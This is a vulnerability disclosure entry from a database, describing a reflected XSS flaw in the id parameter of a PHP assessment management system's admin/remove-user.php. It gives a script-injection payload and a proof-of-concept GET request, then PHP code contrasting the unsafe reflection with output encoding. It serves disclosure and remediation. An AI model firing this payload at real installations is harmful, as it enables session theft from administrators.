Submission #846715: Assessment Management System admin/remove-user.php Reflected XSS Vulnerability v1.0 Reflected XSS Info

Title: Assessment Management System admin/remove-user.php Reflected XSS Vulnerability v1.0 Reflected XSS
Description:

# Assessment Management System admin/remove-user.php Reflected XSS Vulnerability

A reflected cross-site scripting (XSS) vulnerability exists in the `admin/remove-user.php` file of the Assessment Management System. The application reflects user-controlled input from the `id` parameter into an HTML attribute without proper output encoding. As a result, an attacker can inject arbitrary JavaScript that executes in the browser of a victim who visits a crafted URL.

## Impact of the Vulnerability

This vulnerability may allow an attacker to execute arbitrary JavaScript in the browser of a logged-in administrator or other authenticated user. Successful exploitation may lead to session theft, unauthorized actions, sensitive information disclosure, or account compromise within the application context.

## Payload

```
"><ScRiPt>alert(1)</sCrIpT>
```

## Proof of Concept

Send the following request to the vulnerable endpoint:

```http
GET /admin/remove-user.php?id="><ScRiPt>alert(1)</sCrIpT> HTTP/1.1
Host: assessment
Cookie: PHPSESSID=f11os756ltsdgbtk776pklo8cs
```

The application reflects the `id` parameter into the `value` attribute of the Username field without HTML escaping:

```html
<input class="form-control" type="text" value="\"><ScRiPt>alert(1)</sCrIpT>" readonly>
```

The injected double quote closes the original `value` attribute, and the following `<script>` element is interpreted by the browser as executable HTML/JavaScript. This confirms the presence of a reflected XSS vulnerability in `admin/remove-user.php`.

## Source Download

[Assessment Management In PHP With Source Code - Source Code & Projects](https://code-projects.org/assessment-management-in-php-with-source-code/)
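The attribute reflection described above beside its correctly encoded form, as an added example that is not the project's code: the real `admin/remove-user.php` is not shown on this page, so the unsafe renderers are an assumed reconstruction of the pattern. The reflected value in the proof of concept carries a backslash before the quote, which suggests slash-escaping was applied; a backslash is not an HTML escape and does not stop the quote from closing the attribute, so the example includes that variant too.

```php
<?php
// Added example, not the project's own code: the real admin/remove-user.php
// is not reproduced on this page, so the two unsafe renderers below are an
// assumed reconstruction of the reflection pattern the report describes.

// Unsafe: the raw id is concatenated into an HTML attribute. A value starting
// with a double quote closes value="..." and the rest is parsed as markup.
function renderUsernameFieldUnsafe(string $id): string
{
    return '<input class="form-control" type="text" value="' . $id . '" readonly>';
}

// Still unsafe: addslashes() produces the value="\">..." seen in the report's
// response. A backslash means nothing to an HTML parser, so the quote still
// closes the attribute and the injected element still renders.
function renderUsernameFieldSlashed(string $id): string
{
    return '<input class="form-control" type="text" value="' . addslashes($id) . '" readonly>';
}

// Fixed: encode for the HTML attribute context. ENT_QUOTES turns " and ' into
// entities so the attribute cannot be closed; < and > become &lt; and &gt;.
function renderUsernameFieldSafe(string $id): string
{
    $encoded = htmlspecialchars($id, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<input class="form-control" type="text" value="' . $encoded . '" readonly>';
}

// Defence in depth: a user id should be a positive integer, so reject anything
// else before it reaches the database query or the template at all.
function validateUserId(string $raw): ?int
{
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// Input taken from the report's proof of concept.
$payload = '"><ScRiPt>alert(1)</sCrIpT>';

foreach (['unsafe' => 'renderUsernameFieldUnsafe',
          'slashed' => 'renderUsernameFieldSlashed',
          'safe' => 'renderUsernameFieldSafe'] as $label => $render) {
    // Only the safe renderer yields markup containing no raw "<" after the value.
    echo str_pad($label, 8), $render($payload), PHP_EOL;
}

// The payload is not a valid id; '42' is.
var_dump(validateUserId($payload), validateUserId('42'));
```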
Source: https://github.com/zzzxc643/CVE1/blob/main/assessment/vul4.md
User: SSL_Seven_Security_Lab_WangZhiQiang_ZhanXiuChen (UID 97200)
Submitted: 2026-06-03 07:07 AM (1 month ago)
Moderation: 2026-07-03 08:50 PM (1 month later)
Status: Accepted
VulDB entry: 376170 [code-projects Assessment Management 1.0 /admin/remove-user.php id cross site scripting]
Points: 20
